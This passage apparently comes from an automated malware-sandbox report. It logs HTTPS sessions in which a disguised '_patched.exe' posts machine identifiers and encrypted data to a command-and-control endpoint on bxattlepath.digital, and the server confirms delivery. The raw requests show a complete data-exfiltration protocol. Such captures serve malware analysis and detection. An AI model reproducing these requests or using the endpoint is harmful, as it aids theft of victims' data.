                                                                                        2025-04-13 15:03:31 UTC1369INData Raw: 4a 58 6d cc 0f 9e e2 7e 81 2c c0 8d 3d b8 16 9d 29 2f 41 37 8a 69 f6 8d 59 78 af 32 7f 99 ae 50 81 25 7d 3a 96 aa bf 54 85 d8 c0 7c b0 12 e4 a8 d5 ae 45 38 ff 99 da 2c ce 70 12 af 4f ee 78 77 8c 2b b1 09 b4 96 e5 b4 e4 d7 e0 4c 78 ec 76 bf a1 58 67 dd c2 e4 91 bd 4e 34 b1 50 01 31 65 5b 37 3b 63 85 3c 01 e7 66 28 a1 7f 0b db 80 2a bc f5 b9 3c f8 7a e2 3e 8e 24 88 3a 0f f9 7b 95 5d 6e 80 02 fe 24 85 c9 69 c5 00 3f 0b 8a b4 01 5a 45 e4 f2 56 9e a9 98 9a ea 54 16 97 c8 de fe d7 62 e0 e9 9f 76 78 ac 45 c7 05 07 f2 49 56 96 d9 fa 26 97 76 71 53 1b 70 17 23 73 39 ba c9 25 5e 33 05 7c f1 15 75 8b 9b 72 1c 09 1d 8f 39 75 21 1e fe fa e7 75 9c 7e 3e 28 25 bf b5 43 1a 3d 4f c9 a1 41 3e 6e da 85 3f 6d 7f 22 ef 88 52 79 4b 0c 08 79 47 37 5c 86 c0 0e f9 72 14 00 90 b3
                                                                                        Data Ascii: JXm~,=)/A7iYx2P%}:T|E8,pOxw+LxvXgN4P1e[7;c<f(*<z>$:{]n$i?ZEVTbvxEIV&vqSp#s9%^3|ur9u!u~>(%C=OA>n?m"RyKyG7\r
                                                                                        2025-04-13 15:03:31 UTC1369INData Raw: a2 d1 5c bc e6 59 99 f7 cc 71 9f 0b c9 ed 04 e7 bd 90 4e a6 84 1f a9 45 11 41 25 e8 51 fe 52 50 d9 74 03 d7 70 db fc 9f 83 ea 9c 0e df 3b e2 db 01 3c eb 5e ff ec 5d a1 8f af eb e3 7f d5 a9 e4 9b e9 a9 c0 b0 0e 35 92 e5 73 b7 38 2d 56 fb 90 c2 80 3f 41 b7 35 b0 b8 78 ec 75 2a bd 35 6b 37 69 e0 53 df d4 08 4b 37 d4 9a 75 9a 4f 4a 58 00 ae 99 96 52 b6 1b b7 4c 27 ef fd df 9c b3 c5 ef 1a 4a f8 4b 61 b5 25 a5 ac 49 18 5f 9e 1b 5f 58 63 10 b0 ca 9c 9e 43 e4 49 95 ac 78 7a 54 90 fb d4 e2 99 8b 87 ce e8 db 7b 6e 5f b7 a2 1c cb 9f 8c b4 86 8b 33 ad 6b c8 cb a7 74 18 f8 d4 1c 6f b8 75 c4 f9 f4 8a 89 c5 0c d0 19 f2 bc 71 83 e8 3c ba 6a 6c 8e 4c 34 97 79 75 34 1d f0 45 45 d2 96 f8 89 1c 47 35 4d a7 a8 5f 7a f9 b9 9d ce 72 cd 01 7b e3 09 0e fe cc 4d 00 98 3a c0 ee 51
                                                                                        Data Ascii: \YqNEA%QRPtp;<^]5s8-V?A5xu*5k7iSK7uOJXRL'JKa%I__XcCIxzT{n_3ktouq<jlL4yu4EEG5M_zr{M:Q
                                                                                        2025-04-13 15:03:31 UTC1369INData Raw: 7d 70 3e 57 6f e4 33 e4 b4 71 0f 22 bd 09 87 47 0d 0f 99 69 7b bd 38 0b bc 56 68 fd f4 8d 8d ed 76 fb 26 5d 23 28 7d e6 e7 b7 6f e4 15 6f 17 5f 6c c6 df 99 51 08 c7 8f 2e 36 23 49 de f0 b5 8a a8 dc 72 e3 e4 dc b7 57 11 cf 65 2f bc 6c 76 64 f9 f0 a3 16 3b 8b 52 99 05 81 45 d6 be b2 67 82 88 a9 64 59 76 61 ac b5 10 cb 56 08 2c 47 aa c4 3f 4d af 47 6f 3b 42 2a fe a0 95 90 91 fb 36 8c 3c 15 a2 c2 79 cc 3b bf b4 87 d9 7b 39 b6 8c 07 cd a8 ea bf 7c 25 32 0a 17 c3 ba c4 34 85 db c0 ef c4 6e 32 ad f7 81 88 7c f9 4d 57 46 b5 40 b9 fd b6 0b df 54 5e 0a 49 1d 52 8a 8e 02 72 17 c9 eb 27 89 cb 77 23 fd ce fd bd e8 6f ec 36 37 51 60 33 b0 fc 6d 1a 6d ef 4a 60 ef c7 8a 33 ad a8 35 90 3c 9a 30 d8 61 aa 65 e8 4f e1 39 66 95 f8 19 15 f0 4a 5e e2 4f 0b d2 1a 96 e0 c8 4b 46
                                                                                        Data Ascii: }p>Wo3q"Gi{8Vhv&]#(}oo_lQ.6#IrWe/lvd;REgdYvaV,G?MGo;B*6<y;{9|%24n2|MWF@T^IRr'w#o67Q`3mmJ`35<0aeO9fJ^OKF
                                                                                        2025-04-13 15:03:31 UTC1369INData Raw: f9 19 b4 d2 98 de 58 e0 2e 60 3c ed 9c a8 b2 58 85 99 54 12 2f 4c 5f ac d9 93 f6 4d 9f cf c8 a4 d8 37 69 b0 2c c7 d1 fc 30 bf 51 ed 13 62 69 d6 74 5e 02 0b 8e 2b 96 7c 21 e6 5c 1d 7e e0 57 81 e9 0f b9 cf e1 6a 96 b9 65 f9 cf 0d ee 75 34 9a 6c 23 7f 31 3f 4c 84 af 48 c9 93 d8 4e f3 62 2d f6 0d 1c ca 54 a6 d5 2c cc 39 f6 66 3b 97 51 a1 59 84 7f ae d8 1f 34 f5 c9 f8 08 4d 14 98 21 e3 b9 e0 7b 66 e8 6c 40 9a 76 8a 94 a0 cd 7e df 2e a0 1b 21 67 c6 13 4e 3c 10 e0 71 3d 58 06 d8 b2 56 7e 0d 5b 6d 77 54 d6 85 62 41 ad 57 2d 03 f3 5c fc 54 be c0 2a 0c eb e7 ec 08 ee 7f 27 fc ca d2 6e 0b 7f 35 65 9d 40 22 d6 a9 6c 81 8d c2 ce 25 cd 11 e4 e6 13 0d 6c 7d 29 93 39 3b 19 18 a3 bb e4 2a b9 12 7c 72 06 a7 22 b8 aa 23 d7 ab 19 d0 4b c8 7e d8 20 f7 77 84 b7 22 20 30 8c 11
                                                                                        Data Ascii: X.`<XT/L_M7i,0Qbit^+|!\~Wjeu4l#1?LHNb-T,9f;QY4M!{fl@v~.!gN<q=XV~[mwTbAW-\T*'n5e@"l%l})9;*|r"#K~ w" 0
                                                                                        2025-04-13 15:03:31 UTC1369INData Raw: 21 3b 2f 8b 35 23 a4 ce 7f 03 56 54 56 f7 7e 4d 36 1a d0 15 6e e8 5b 5b b8 50 f3 4e a1 79 06 3a 6f 60 a9 e4 a8 3c e2 c5 bd 11 3b 82 2e 70 cc 32 35 b5 2a 28 a0 9f 63 b5 fc d8 49 b0 46 46 ed 7a 75 a5 a2 d4 92 c9 61 8d 84 be 00 70 a9 f3 e5 07 e9 a7 2a 37 d8 b9 56 aa e1 3b 68 47 5d ca 3f 20 2f 8e 1f 7b 1e a7 f1 2a 98 03 ba 3b cd b4 a2 ab d0 28 ed 77 3e d6 f4 7c 94 62 a4 4a ac a9 e1 65 15 6c ae bc 20 df b6 1b b0 e6 93 54 fa 3a 7b 3a 8c 5f 49 2f 71 da d1 e4 36 c9 20 e3 47 5f 89 d9 82 9f af fd 0f 11 d2 cf eb b9 1b 83 3f 1c 0d ad 14 a0 5e bf d1 e7 ab bf 5a af cc da d4 25 31 68 ac 48 b7 6c 04 15 c7 d9 57 bc d6 10 21 ce b1 b0 47 5d ce c3 48 22 d8 6a e0 f6 87 66 f6 45 aa cd 10 ec 36 de 06 25 0b 66 70 9a ca 88 a9 75 62 cb e0 29 48 a7 d5 cd be e6 ea fa 9f 1f 32 8c ab
                                                                                        Data Ascii: !;/5#VTV~M6n[[PNy:o`<;.p25*(cIFFzuap*7V;hG]? /{*;(w>|bJel T:{:_I/q6 G_?^Z%1hHlW!G]H"jfE6%fpub)H2
                                                                                        2025-04-13 15:03:31 UTC1369INData Raw: 99 78 e3 e0 80 c2 17 e9 9a 4a df ff 7b f6 b0 e1 24 bd d1 b5 77 88 76 17 4d a3 b5 bc 15 27 12 03 94 ef 33 0c a3 18 74 fe a3 6b 76 c7 a6 b8 f8 ae e3 4a 63 5c f5 cc fa dc ce b6 b6 92 7c 97 a8 11 b3 5b 38 1d ff 25 23 c4 f4 eb dd 26 d4 60 80 03 07 48 ea 8b 2b 61 0a 02 4e 16 7a db 09 4a 72 83 7d 93 f5 a9 52 c5 c4 f4 0d 26 d6 31 e0 9a 8e 94 0a 29 27 31 44 9c 77 cb 2f de 14 45 88 f8 8d 67 f2 be 00 06 32 93 dc 74 e7 0d 19 15 11 4a 43 a8 a6 31 4a f2 e8 ff 13 34 8e 9c 2b b3 ec 93 de f7 95 d6 89 6d fc 14 12 c9 e6 bf f4 2e b7 cc 25 44 5d e6 73 84 88 52 b7 98 82 f7 bc 31 f8 88 41 d1 09 b1 04 93 ff fc 81 d8 d0 b5 ba 28 49 1d c3 04 a2 02 e9 29 0a a5 38 1a ed a1 c3 f1 75 61 9b ac 48 4a 94 cf e4 e5 b6 f6 42 c1 50 da 81 36 f7 35 de 97 46 54 65 6c 0d 8f 1d 3f 8d 50 29 21 17
                                                                                        Data Ascii: xJ{$wvM'3tkvJc\|[8%#&`H+aNzJr}R&1)'1Dw/Eg2tJC1J4+m.%D]sR1A(I)8uaHJBP65FTel?P)!
                                                                                        2025-04-13 15:03:31 UTC765INData Raw: aa f9 41 f8 62 96 a3 49 2d 39 09 bd 1e fd c0 0e cc 81 c2 62 af d7 9a 94 9a 95 90 35 a4 80 8d 2c a1 8b b7 36 82 62 77 61 b3 8f 78 66 6e f3 40 91 4b 97 ab 59 b4 a9 75 db 1f ae 76 22 40 39 3f 77 07 51 e9 65 dd 31 ad c3 9d 80 38 be fb b8 bb 44 53 1c 09 d2 6b b3 1d 0f 87 c4 cb 53 fa da c6 38 d4 c3 85 b9 03 0d 0e 15 04 6a 79 1a 5e 17 77 a0 64 76 3f ac fc e1 a1 21 26 6a 1e 3d 72 81 18 bd 87 d9 10 84 e0 67 88 40 41 6c 81 68 c4 19 e6 92 02 30 a8 e3 9f 41 12 b9 ab 0a ad 3e 01 b5 03 fd a5 f2 d3 17 d2 75 15 48 24 91 61 7d 00 05 54 20 2a a5 b4 bd 25 37 e9 73 c5 92 21 cb 91 79 67 72 de fe 5f 23 ab 13 0a 90 51 9b 1e ca d5 e7 70 dc 96 4a ce 18 73 93 2f a5 45 ed 72 0c 7d 01 1a c3 59 48 31 90 a4 94 2e b7 2d 35 0b 52 24 1e 1b e0 79 8f 0f 39 06 ee 8b 1a 44 86 64 70 c7 b3 e0
                                                                                        Data Ascii: AbI-9b5,6bwaxfn@KYuv"@9?wQe18DSkS8jy^wdv?!&j=rg@Alh0A>uH$a}T *%7s!ygr_#QpJs/Er}YH1.-5R$y9Ddp


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449723172.67.157.74436168C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-04-13 15:03:33 UTC284OUTPOST /ogda HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=K1Cxtx5909AxbEK2
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                        Content-Length: 19607
                                                                                        Host: bxattlepath.digital
                                                                                        2025-04-13 15:03:33 UTC15331OUTData Raw: 2d 2d 4b 31 43 78 74 78 35 39 30 39 41 78 62 45 4b 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 33 66 66 63 39 34 38 37 31 38 63 36 61 62 63 36 32 35 38 37 39 38 64 35 66 65 34 36 31 34 38 32 61 35 65 63 63 35 0d 0a 2d 2d 4b 31 43 78 74 78 35 39 30 39 41 78 62 45 4b 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 31 43 78 74 78 35 39 30 39 41 78 62 45 4b 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 34 38 31 46 35 34 35 39 45 39 37
                                                                                        Data Ascii: --K1Cxtx5909AxbEK2Content-Disposition: form-data; name="uid"3ffc948718c6abc6258798d5fe461482a5ecc5--K1Cxtx5909AxbEK2Content-Disposition: form-data; name="pid"2--K1Cxtx5909AxbEK2Content-Disposition: form-data; name="hwid"0D481F5459E97
                                                                                        2025-04-13 15:03:33 UTC4276OUTData Raw: 14 1d b1 11 01 77 b4 c6 6d ae 0c a1 3b 2b a1 99 cd 3d 70 75 3f da 3e c3 b6 01 a0 7f dc 5b 57 21 16 3a 9f 23 cd 0e 5d 0d 91 b2 49 45 4d 74 d3 89 8d 0f b8 72 33 5f 29 10 96 5f f0 17 10 ac a6 79 ca 85 eb 17 ab a3 26 60 d8 e1 86 9a 11 10 a9 05 b5 7d 5e c6 41 c7 4b 8c 66 32 0d ff 84 e9 5d aa 1a 11 1a 1a 62 9c f8 1b 7b bc 53 d1 22 85 8b cc 1e 24 07 a9 37 c1 dd 99 cb 0f ea 99 51 f6 cc 5a c5 c1 c3 bb 56 c6 3e 6e ae aa af d1 20 ef 13 af fb 27 7f 9c a8 63 70 27 21 66 b1 96 20 0a a7 98 4d ff 54 24 c3 bc 69 6f 30 5e 89 c0 14 29 0f c8 be 57 92 a5 73 95 b9 a2 43 b7 80 c1 ae 37 09 86 67 c6 67 b7 71 51 ab 12 66 7f dc 6b e5 e0 38 f8 f7 02 d1 42 27 e1 59 41 b8 02 d1 2a 59 87 07 e6 66 2a d9 6b 10 4d 88 a2 f4 c1 51 a7 0d b6 d3 40 d5 34 7b 24 cb aa df 67 64 74 6e 6e 9b 0f cf
                                                                                        Data Ascii: wm;+=pu?>[W!:#]IEMtr3_)_y&`}^AKf2]b{S"$7QZV>n 'cp'!f MT$io0^)WsC7ggqQfk8B'YA*Yf*kMQ@4{$gdtnn
                                                                                        2025-04-13 15:03:33 UTC814INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Apr 2025 15:03:33 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b9fzQ9cr4KF8guJpgDiOa3BSq%2BwuwYuluUBMe54THQetumyZifRy4a5dwnJoSzXEhHDDnKz2%2BbQlA3Pr4sl7px8tAAeRsF1A%2Fx2IxKYh%2FAvM1jZFKHoo2wRuvv9kebpRRD06PKG0"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92fbd9d0c9ba4569-ATL
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=106080&min_rtt=106065&rtt_var=22397&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2847&recv_bytes=20571&delivery_rate=38052&cwnd=252&unsent_bytes=0&cid=e5d875eb0da72353&ts=702&x=0"
                                                                                        2025-04-13 15:03:33 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                                        Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                                        2025-04-13 15:03:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449724172.67.157.74436168C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-04-13 15:03:34 UTC284OUTPOST /ogda HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=Kb2pYEC1I8GWMjfh1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                        Content-Length: 8769
                                                                                        Host: bxattlepath.digital
                                                                                        2025-04-13 15:03:34 UTC8769OUTData Raw: 2d 2d 4b 62 32 70 59 45 43 31 49 38 47 57 4d 6a 66 68 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 33 66 66 63 39 34 38 37 31 38 63 36 61 62 63 36 32 35 38 37 39 38 64 35 66 65 34 36 31 34 38 32 61 35 65 63 63 35 0d 0a 2d 2d 4b 62 32 70 59 45 43 31 49 38 47 57 4d 6a 66 68 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 62 32 70 59 45 43 31 49 38 47 57 4d 6a 66 68 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 34 38 31 46 35 34 35 39
                                                                                        Data Ascii: --Kb2pYEC1I8GWMjfh1Content-Disposition: form-data; name="uid"3ffc948718c6abc6258798d5fe461482a5ecc5--Kb2pYEC1I8GWMjfh1Content-Disposition: form-data; name="pid"2--Kb2pYEC1I8GWMjfh1Content-Disposition: form-data; name="hwid"0D481F5459
                                                                                        2025-04-13 15:03:35 UTC814INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Apr 2025 15:03:34 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tsNWDqTFRy6%2F6MY9dcdbfxnqANp5t4h0sP64sKHo2CvENHJdZQOX2h5w8AchlGN5b9tewMzOpvCw948lbc%2Bo5UvslzoWwma1MpKnrnMiX4zd%2Fvvuorx%2FNEnVcWj0QZFAPRTwhPY%2F"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92fbd9d89c90bf95-ATL
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=106192&min_rtt=106159&rtt_var=22421&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9711&delivery_rate=38032&cwnd=252&unsent_bytes=0&cid=b7249555923b3a21&ts=581&x=0"
                                                                                        2025-04-13 15:03:35 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                                        Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                                        2025-04-13 15:03:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449725172.67.157.74436168C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-04-13 15:03:35 UTC279OUTPOST /ogda HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=0OAv0jt465W
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                        Content-Length: 20392
                                                                                        Host: bxattlepath.digital
                                                                                        2025-04-13 15:03:35 UTC15331OUTData Raw: 2d 2d 30 4f 41 76 30 6a 74 34 36 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 33 66 66 63 39 34 38 37 31 38 63 36 61 62 63 36 32 35 38 37 39 38 64 35 66 65 34 36 31 34 38 32 61 35 65 63 63 35 0d 0a 2d 2d 30 4f 41 76 30 6a 74 34 36 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 4f 41 76 30 6a 74 34 36 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 34 38 31 46 35 34 35 39 45 39 37 34 32 44 41 44 35 39 43 34 43 41 31 39 41 45
                                                                                        Data Ascii: --0OAv0jt465WContent-Disposition: form-data; name="uid"3ffc948718c6abc6258798d5fe461482a5ecc5--0OAv0jt465WContent-Disposition: form-data; name="pid"3--0OAv0jt465WContent-Disposition: form-data; name="hwid"0D481F5459E9742DAD59C4CA19AE
                                                                                        2025-04-13 15:03:35 UTC5061OUTData Raw: 14 f5 da 8c 6a 2f 5b 1a 25 6a a8 83 3b 08 80 e9 16 fc 0e 05 fa fd 93 1c 06 8c 49 62 81 b5 b7 5e 1e 58 a2 66 bf 1b a1 5b ff db d6 3b 1b 62 b3 99 c6 7b a3 4e ee 28 58 e3 86 43 87 eb 78 71 3a ca 9f 33 a3 ed 6d e6 9d 8b d2 57 99 0e db 2e 08 0a a9 b6 53 ea 18 2e 3d 82 ad 95 e2 8b c5 30 4a 17 d0 74 10 63 86 d4 e3 99 d4 54 39 6a 84 7e 35 53 4c 81 70 36 d7 ad cc da 3d bb a5 52 1d a6 bf 76 40 32 49 b9 b5 ed 49 94 9f 6f 51 2c de 51 33 ad 6e d9 58 a5 cc 0a 9f b4 5a 10 82 cd ae 58 98 9b ff 32 56 66 b3 f2 30 d1 08 8f 80 e9 3c f5 01 b7 2e 7c 0d 99 00 af b7 73 2f e4 53 bd c6 6c bf 9c 4d ba 11 1e d0 08 77 89 13 7f 53 94 ff 3e 3c b2 80 26 b9 30 b1 38 cc 46 b1 14 df 2c 18 66 96 48 42 92 35 93 db b4 b5 6d 1e f9 9b f6 b9 b9 96 61 95 83 6c c9 e0 e3 48 bd 55 50 68 8b 2b 7d 39
                                                                                        Data Ascii: j/[%j;Ib^Xf[;b{N(XCxq:3mW.S.=0JtcT9j~5SLp6=Rv@2IIoQ,Q3nXZX2Vf0<.|s/SlMwS><&08F,fHB5malHUPh+}9
                                                                                        2025-04-13 15:03:36 UTC820INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Apr 2025 15:03:36 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fuq504BmYmS7MSbOCXiL%2BTpwqcpYJQTP0Ib%2BtQAEP3qVfzoMkw0zSYIv5lHBfN1%2F%2FMNLfjcgqwG6Va9rfTPSoURJnOUTAmRfJVxyamJDrCMBpnac8ML5gVlU6dENtf7JpJ%2BeR%2B%2FA"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92fbd9e22abd804f-JAX
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=112740&min_rtt=112622&rtt_var=23935&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21351&delivery_rate=35739&cwnd=252&unsent_bytes=0&cid=6af0e0828213f236&ts=679&x=0"
                                                                                        2025-04-13 15:03:36 UTC76INData Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a
                                                                                        Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
                                                                                        2025-04-13 15:03:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.449726172.67.157.74436168C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-04-13 15:03:40 UTC275OUTPOST /ogda HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=jO7676pr
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                        Content-Length: 5412
                                                                                        Host: bxattlepath.digital
                                                                                        2025-04-13 15:03:40 UTC5412OUTData Raw: 2d 2d 6a 4f 37 36 37 36 70 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 33 66 66 63 39 34 38 37 31 38 63 36 61 62 63 36 32 35 38 37 39 38 64 35 66 65 34 36 31 34 38 32 61 35 65 63 63 35 0d 0a 2d 2d 6a 4f 37 36 37 36 70 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 6a 4f 37 36 37 36 70 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 34 38 31 46 35 34 35 39 45 39 37 34 32 44 41 44 35 39 43 34 43 41 31 39 41 45 37 36 32 35 0d 0a 2d 2d 6a
                                                                                        Data Ascii: --jO7676prContent-Disposition: form-data; name="uid"3ffc948718c6abc6258798d5fe461482a5ecc5--jO7676prContent-Disposition: form-data; name="pid"1--jO7676prContent-Disposition: form-data; name="hwid"0D481F5459E9742DAD59C4CA19AE7625--j
                                                                                        2025-04-13 15:03:41 UTC814INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Apr 2025 15:03:41 GMT
                                                                                        Content-Type: application/json
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rXM7x5SMQRiO1a6uKMivUMoXR6qpNSLOh09TfUqy%2Fih%2FIrL41jbrjimWjMAZnWg%2Fq7hd3NyYPwz02KpjqSRiWIOEND7bzkl9eVCtxgwaL%2Ba9N65gj3pTqzQiqba86%2F9Tiq6KkSDz"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 92fbd9fffe60adf4-JAX
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=113890&min_rtt=113809&rtt_var=24129&sent=7&recv=12&lost=0&retrans=0&sent_bytes=2847&recv_bytes=6323&delivery_rate=35402&cwnd=252&unsent_bytes=0&cid=25f0a1fa1771dee8&ts=446&x=0"
